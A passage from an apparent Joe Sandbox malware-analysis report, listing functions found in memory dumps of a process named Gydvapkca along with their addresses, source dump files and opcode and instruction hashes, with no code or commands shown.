                          • Opcode Fuzzy Hash: 620e486b159b3195a887aa9c6e8d621474363a8b90f2f113ba1bd0d9a2a97632
                          • Instruction Fuzzy Hash: A741C374E15209DFE705EFA9C588BAEBBF1EF95308F00C4A6D401A7254C7784948CF52
                          Function 02218DC8 Relevance: .1, Instructions: 85COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2224336190.0000000002210000.00000040.00000800.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2210000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d2490a0a77cd5f3f51ae8a880e4e1d5005d3f642446d6131b715b9961bda1250
                          • Instruction ID: b54f28debafd1769bfb507ff1ac8624fb8a653930408d0a9c79509a086a43fbb
                          • Opcode Fuzzy Hash: d2490a0a77cd5f3f51ae8a880e4e1d5005d3f642446d6131b715b9961bda1250
                          • Instruction Fuzzy Hash: 11318C74E10109DFEB04EF99D1C8BAEBBF2EB99308F10C465E915A7258CB785944CF52
                          Function 0217D4F4 Relevance: .1, Instructions: 75COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2223027376.000000000217D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0217D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_217d000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1ea35dfa7e5f81895ddc0e342632e98d5f4cbe59171f91878350b5c6689bc32a
                          • Instruction ID: 940c4055abc7c228d79dcb80ab53a5c761666358bfbe49127ec0123585ec5592
                          • Opcode Fuzzy Hash: 1ea35dfa7e5f81895ddc0e342632e98d5f4cbe59171f91878350b5c6689bc32a
                          • Instruction Fuzzy Hash: E521D0B2584248DFDB15DF14E9C0B26BF75FFC8328F248669E9090A256C336D456CBA2
                          Function 0218D030 Relevance: .1, Instructions: 74COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2223576699.000000000218D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0218D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_218d000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e72e78f29308c5b70182a1f0df548b61d39522d20f02e43fc5401e5cf333c57f
                          • Instruction ID: c3361dc74b1f4f7fdd1314ce45cf378705a2160d217509f1cd390148c9c8672b
                          • Opcode Fuzzy Hash: e72e78f29308c5b70182a1f0df548b61d39522d20f02e43fc5401e5cf333c57f
                          • Instruction Fuzzy Hash: 52210771644344DFDB15EF24E9C4B2ABF65FB88314F24C569E9095B286C336D806CFA2
                          Function 0218D007 Relevance: .1, Instructions: 69COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2223576699.000000000218D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0218D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_218d000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d2b6c8bbc309eb201f9c989397ab21aa528a3b012189c6f09e7b0cec359ad20c
                          • Instruction ID: 3300ea69ee5d729a3b984f7fd14fb473b36c3eb0012d5f375f6263fe24e33539
                          • Opcode Fuzzy Hash: d2b6c8bbc309eb201f9c989397ab21aa528a3b012189c6f09e7b0cec359ad20c
                          • Instruction Fuzzy Hash: 62217C7554D3C08FCB03DF24D990715BF71AF46210F2981DAD8888B2A7C339980ACB62
                          Function 0221E520 Relevance: .1, Instructions: 58COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2224336190.0000000002210000.00000040.00000800.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2210000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 214c5f403a6f3ff009b2509f338ae1015c2e39d68cd69242407d46d9cbd0de20
                          • Instruction ID: 304bb3c31afcb2014879cd4ce8e8e149cf94448c10ad000c125f4c9171aa9a5b
                          • Opcode Fuzzy Hash: 214c5f403a6f3ff009b2509f338ae1015c2e39d68cd69242407d46d9cbd0de20
                          • Instruction Fuzzy Hash: 751137B0D14209DBCB14CFD9D845AEEBBF6FF98310F14842AD905B3214EB745A54CBA1
                          Function 0217D4EF Relevance: .1, Instructions: 56COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2223027376.000000000217D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0217D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_217d000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
                          • Instruction ID: 4bfa667569716b206403fe67492fe7bbd100d5c1c316fe2c3ac2aa39fa67a1e0
                          • Opcode Fuzzy Hash: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
                          • Instruction Fuzzy Hash: 9311D376544284CFCB16CF14D5C4B16BF71FF84328F24C6A9D8490B656C33AD45ACBA2
                          Function 022140A4 Relevance: .0, Instructions: 45COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2224336190.0000000002210000.00000040.00000800.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2210000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9f4f9eb5f61a5388125262cf00e59ad879f7f81b2af3c9e07cf1735db789a386
                          • Instruction ID: 455189832cd8e56cbc6971e90500ae1e3e74fc232dfd4089280755b7c2409f66
                          • Opcode Fuzzy Hash: 9f4f9eb5f61a5388125262cf00e59ad879f7f81b2af3c9e07cf1735db789a386
                          • Instruction Fuzzy Hash: F2113975A10219CFDB18DFE9D540ADEBBF2BF88305F208469D409BB294CB759D41CB60
                          Function 05DD2CAF Relevance: .0, Instructions: 40COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2256339033.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5dd0000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7413889fd8551456729e8dea11a2aa5498212c0d85898e0b6646287c8b4416f4
                          • Instruction ID: 36322ef94657aff59f11f8ea8bf3ab224120644e647c58dc4a2cd25cf52eac7a
                          • Opcode Fuzzy Hash: 7413889fd8551456729e8dea11a2aa5498212c0d85898e0b6646287c8b4416f4
                          • Instruction Fuzzy Hash: 5C11BF74A40629CFDB65DF68DC88BDABBB1BB88301F0140EA9419A7740EB349E84DF11
                          Function 05DEF878 Relevance: .0, Instructions: 39COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2256339033.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5dd0000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a88f607b6b3af357a2c33800d12327651e25dddb88273c46bf1890facb98d5b8
                          • Instruction ID: 8452c8c13eacc191337ec667bc92e8c6d7cd0c7bb192106030331fd8e1c64c2f
                          • Opcode Fuzzy Hash: a88f607b6b3af357a2c33800d12327651e25dddb88273c46bf1890facb98d5b8
                          • Instruction Fuzzy Hash: 920131363046109FC709AB68D45491EBBA6EFCD711B108529E90A8B394CFB1ED42CBE4
                          Function 05DD5DFA Relevance: .0, Instructions: 38COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2256339033.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5dd0000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8f769f937981cd9250b66be9565486b005ebb1db08cbff7bafd90a34a46d8b66
                          • Instruction ID: 20342918feed5882b2412de1e375a3a0eabaaf15e951e88409d808570210475c
                          • Opcode Fuzzy Hash: 8f769f937981cd9250b66be9565486b005ebb1db08cbff7bafd90a34a46d8b66
                          • Instruction Fuzzy Hash: C6110334D0926ACFCB24DF24C889BEEBBB1BF45300F0045EA9419A3641EB744AC8CF52
                          Function 022109B0 Relevance: .0, Instructions: 37COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2224336190.0000000002210000.00000040.00000800.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2210000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0e1af5681133f4a5d522fb8effdc197036c6f48e8caff6da253fa476dd5492e8
                          • Instruction ID: 773e6a7c68b25bae6713965ee6a7b3a90e6fe21335796188d250ff87c6891290
                          • Opcode Fuzzy Hash: 0e1af5681133f4a5d522fb8effdc197036c6f48e8caff6da253fa476dd5492e8
                          • Instruction Fuzzy Hash: EC01D130A242998BDB15ABB485557EE7FF2AF88300F1404AED482F7385DF740E85CBA5
                          Function 05DEF600 Relevance: .0, Instructions: 32COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2256339033.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5dd0000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b26bfe8f8ccf9c3d44a038ee006b97284a61617c6e0151f64b2d89aac6380b0a
                          • Instruction ID: f6afdd454d1dc9d8ee6e01ec3c1f12807d1e9bcda4cb37809b71fae33c20f649
                          • Opcode Fuzzy Hash: b26bfe8f8ccf9c3d44a038ee006b97284a61617c6e0151f64b2d89aac6380b0a
                          • Instruction Fuzzy Hash: 9DF0FE393507009FC718DB29D454D3A77AAFFC9721B154069F95A8B3A0CA71EC42DB90
                          Function 02210CE0 Relevance: .0, Instructions: 27COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2224336190.0000000002210000.00000040.00000800.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2210000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f1bf6480cd46947eee5de5ee28a7013149c2fb1d758aca2474d70af1a5cd5ad8
                          • Instruction ID: 97309b778985bbfa4ec5c67d3d532867d769f349b159505b3f9a92aad60f21dd
                          • Opcode Fuzzy Hash: f1bf6480cd46947eee5de5ee28a7013149c2fb1d758aca2474d70af1a5cd5ad8
                          • Instruction Fuzzy Hash: 3BE08636714218AFD704DAE8F4409DABBEDEB49371F10407BE50CC3644EA32E94187A0
                          Function 05AD1150 Relevance: .0, Instructions: 24COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2254939413.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ad0000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: acef42d09b4c281ff29dcc9dc1d1965ba722e0a503e93e9dac76ca988d63909f
                          • Instruction ID: d93282365d0b400f64e1e89af1e770a60baaad26d7edfd729898f73d63b626e8
                          • Opcode Fuzzy Hash: acef42d09b4c281ff29dcc9dc1d1965ba722e0a503e93e9dac76ca988d63909f
                          • Instruction Fuzzy Hash: 60E0267058F344DEC7069B79880097CBBF99B43120F4412EED466872E2DA354944C351
                          Function 05AD0DB8 Relevance: .0, Instructions: 23COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2254939413.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ad0000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 426b164cea7f5de6429b816e1829f5632f47c7b6d10e0083df3ebec9e7389847
                          • Instruction ID: d4f93a3b577e2ec8345fccc523eada3589f786941f46e70e018b8fe07c18eebb
                          • Opcode Fuzzy Hash: 426b164cea7f5de6429b816e1829f5632f47c7b6d10e0083df3ebec9e7389847
                          • Instruction Fuzzy Hash: 6FE0267440E208DFC300DB94C844A69FBB8EF02348F1550DEC809AB392DA32AD05C771
                          Function 05AD0790 Relevance: .0, Instructions: 23COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2254939413.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ad0000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d68c1a7018460af33f1e251e7e1535bef23605fb3aa6a0c193696af06ad266f2
                          • Instruction ID: 25341912017b636ab3cd4e10ebcecd08757c5ce0955f500c3ddf699906740bfa
                          • Opcode Fuzzy Hash: d68c1a7018460af33f1e251e7e1535bef23605fb3aa6a0c193696af06ad266f2
                          • Instruction Fuzzy Hash: 18E09230D49204DFCB40EB64D9885ACBFB1EB46321F108299C425573D1DA355E41CB40
                          Function 05DE9560 Relevance: .0, Instructions: 23COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2256339033.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5dd0000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 67cd570636013f56507229234a74342129a1ab911e16ed39c2aa0c515676ec02
                          • Instruction ID: 7c3419533aaa06487d2b22db76de7db5f24f7b479811a1748a96d3c5bc49bfb7
                          • Opcode Fuzzy Hash: 67cd570636013f56507229234a74342129a1ab911e16ed39c2aa0c515676ec02
                          • Instruction Fuzzy Hash: E9E0ED74D45208EFCB84DFA8D980AADFBF5EB48310F10C5AA9C5993340D6359B52DF40
                          Function 05DE5278 Relevance: .0, Instructions: 23COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2256339033.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5dd0000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 67cd570636013f56507229234a74342129a1ab911e16ed39c2aa0c515676ec02
                          • Instruction ID: 8629a839b731e21a8972f19b92d4dae22573aa587545a77ae466e8eaf751d237
                          • Opcode Fuzzy Hash: 67cd570636013f56507229234a74342129a1ab911e16ed39c2aa0c515676ec02
                          • Instruction Fuzzy Hash: 84E0ED74D45208EFCB84DFA8D980AADFBF5FB49314F10C0AA980993340D7359A51DF40
                          Function 05DEBE30 Relevance: .0, Instructions: 23COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2256339033.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5dd0000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 67cd570636013f56507229234a74342129a1ab911e16ed39c2aa0c515676ec02
                          • Instruction ID: 32de3097ea7cec63a56a70a3e96262b9f4117aa9ba1d13ce2a851e19c2e2809c
                          • Opcode Fuzzy Hash: 67cd570636013f56507229234a74342129a1ab911e16ed39c2aa0c515676ec02
                          • Instruction Fuzzy Hash: 15E0C974D05208EFCB84DFA8D985AADBBF5EB48710F10C0AA995893340D635AA51DF80
                          Function 02210A33 Relevance: .0, Instructions: 23COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2224336190.0000000002210000.00000040.00000800.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2210000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9793b2b1f6fec927bec264975d70e22683d2245d50b8bfcc14f7ba473471ebba
                          • Instruction ID: 22a7ecc35656e60fcdcb8dd54b7f447bf6dc2918a3d2531fa4d755ec0431feda
                          • Opcode Fuzzy Hash: 9793b2b1f6fec927bec264975d70e22683d2245d50b8bfcc14f7ba473471ebba
                          • Instruction Fuzzy Hash: 5BE06570A60119CFDB14FBA484557AE7AF2AB9C300F100819D402F7288DF740F80CB91
                          Function 05DEC780 Relevance: .0, Instructions: 22COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2256339033.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5dd0000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 01a9820370946c78faf28a299ebd75ca360b1274521cbb1f623ac5ec725370e7
                          • Instruction ID: c6011339b6f93bbaaaf1c20e8f998c8ffa83cd4b16bb3609a5d981a394f10a14
                          • Opcode Fuzzy Hash: 01a9820370946c78faf28a299ebd75ca360b1274521cbb1f623ac5ec725370e7
                          • Instruction Fuzzy Hash: 36E0E574E05208EFCB84EFA8D9806ACBBF4EB88300F10C0AA981893350D7359E41CF40
                          Function 05DEEDF0 Relevance: .0, Instructions: 21COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2256339033.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5dd0000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e142b803807263628c0ccc192ec029d8135b65de9deb34a81479d3c1c835cd04
                          • Instruction ID: 650fc5f768b1d9e19c55f00097cc8fcf9c2cb0cee5f9921b5449feaa85c36ffd
                          • Opcode Fuzzy Hash: e142b803807263628c0ccc192ec029d8135b65de9deb34a81479d3c1c835cd04
                          • Instruction Fuzzy Hash: 51E0867490910CEFC744DFA4D9849BDBFB9EB45311F14C0AAD84857341C7319A51DB90
                          Function 05DE7E50 Relevance: .0, Instructions: 20COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2256339033.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5dd0000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2dec69bf0875f8bcb4118ad31f25fee1aa8384aea9896135bc9f6dbb836b90b1
                          • Instruction ID: 27aeb8484ea75a5b9df7a7559920b1616d142da6f7760588f2a4762871d8af50
                          • Opcode Fuzzy Hash: 2dec69bf0875f8bcb4118ad31f25fee1aa8384aea9896135bc9f6dbb836b90b1
                          • Instruction Fuzzy Hash: 87E01A34D09148AFCB84DB98D5805ACBBB4EB48200F5080AA985853341D6359E41DB40
                          Function 05DEEA28 Relevance: .0, Instructions: 20COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2256339033.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5dd0000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2dec69bf0875f8bcb4118ad31f25fee1aa8384aea9896135bc9f6dbb836b90b1
                          • Instruction ID: 45ecec9393d7b3c2f452ad01967115befadf4fd2588e9ba90e38711e36895516
                          • Opcode Fuzzy Hash: 2dec69bf0875f8bcb4118ad31f25fee1aa8384aea9896135bc9f6dbb836b90b1
                          • Instruction Fuzzy Hash: 06E01A34D09108AFC744EF98D5815ACBBB9EB48200F14C1EE984853341DA359A41DB40
                          Function 05AD07A0 Relevance: .0, Instructions: 19COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2254939413.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ad0000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3c3b7d919c90300d91ebd23a8cf79b36661a1dae7f47c9e7668ea565a63c7807
                          • Instruction ID: 5afef642713c80730871bbc9f1888a479366abb4efeff79ea39e05f36e32be00
                          • Opcode Fuzzy Hash: 3c3b7d919c90300d91ebd23a8cf79b36661a1dae7f47c9e7668ea565a63c7807
                          • Instruction Fuzzy Hash: 03E0C234D09208EBC744EFA4D9889ACFBB5FB45300F1080A8C80917340DB315E42CF90
                          Function 05DECEF8 Relevance: .0, Instructions: 19COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2256339033.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5dd0000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c8938f4790bd533f85b5a011518b7cb30729b44c1e0ce12ceef4cf0a790b5371
                          • Instruction ID: 9b6463c11e35ed9119565859c57f19b92970a91c0434a87a30332cf3c4ae3387
                          • Opcode Fuzzy Hash: c8938f4790bd533f85b5a011518b7cb30729b44c1e0ce12ceef4cf0a790b5371
                          • Instruction Fuzzy Hash: 8AE0C23490A108DBCB04EF94D9809ACBBB8EB45301F1080ADD80813351CB319E42DB80
                          Function 0221D280 Relevance: .0, Instructions: 19COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2224336190.0000000002210000.00000040.00000800.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2210000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4d4014945655b57220af384608a60b3bff6ba03fe0a9824dd2d762aa6a965796
                          • Instruction ID: 2aa7995dbf665d8cc0f37e5cbd79676189095dc17667d05f4490ef67df404bad
                          • Opcode Fuzzy Hash: 4d4014945655b57220af384608a60b3bff6ba03fe0a9824dd2d762aa6a965796
                          • Instruction Fuzzy Hash: 03E0C27290110CEFCB00EFF5C448A9E7BF8EB45201F4044E5D504D3100EE755E009B91
                          Function 05AD0DC8 Relevance: .0, Instructions: 17COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2254939413.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ad0000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 571c00ba166d5108f320c82f5f5a97eebfd5189da77965f7c2f729d60cbe53db
                          • Instruction ID: aa68975db3ab88825a3d0912068e43e11accfb0b64ad7d0668ef4aee1e17069f
                          • Opcode Fuzzy Hash: 571c00ba166d5108f320c82f5f5a97eebfd5189da77965f7c2f729d60cbe53db
                          • Instruction Fuzzy Hash: 16D05E3894A108EBC744DB94D984E69F7B8EB45314F109099980A53341DA32AD41CBA0
                          Function 05AD1160 Relevance: .0, Instructions: 16COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2254939413.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ad0000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 484b8ec8bdcd64d60275010dc1b695da8511296df3c2e06e258bc17028a2b316
                          • Instruction ID: fa97accc407797d359a9aa55d2d6738fb875052f78005ebb2a4df216c58d8b33
                          • Opcode Fuzzy Hash: 484b8ec8bdcd64d60275010dc1b695da8511296df3c2e06e258bc17028a2b316
                          • Instruction Fuzzy Hash: 45D0A97098B208EBC788EBA8C940EADB3FDEB02206F4010ACA40A12310CA3A4940CB60
                          Function 05DED348 Relevance: .0, Instructions: 12COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2256339033.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5dd0000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6034c375c734382f39cb805c02ac8602b207efd5420d752bc020f3891c3c5e56
                          • Instruction ID: dc00f03da4c0b2056a7dbb6b47ee990b9fc8c1e8444762457e567e92f1fe53d9
                          • Opcode Fuzzy Hash: 6034c375c734382f39cb805c02ac8602b207efd5420d752bc020f3891c3c5e56
                          • Instruction Fuzzy Hash: 57C02B300CF208C6C1443284688D37173DFD706306F4C3C16510D01050CEBC6C50C730
                          Function 05DEF5D8 Relevance: .0, Instructions: 8COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2256339033.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5dd0000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                          • Instruction ID: a5ced1602b898661de329531365079a034e3d75a808f59c5ffcbefa728424f66
                          • Opcode Fuzzy Hash: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                          • Instruction Fuzzy Hash: 58C0927A140208EFC700DF69E848C85BBB8EF1977171180A1FA088B332C732EC60DA94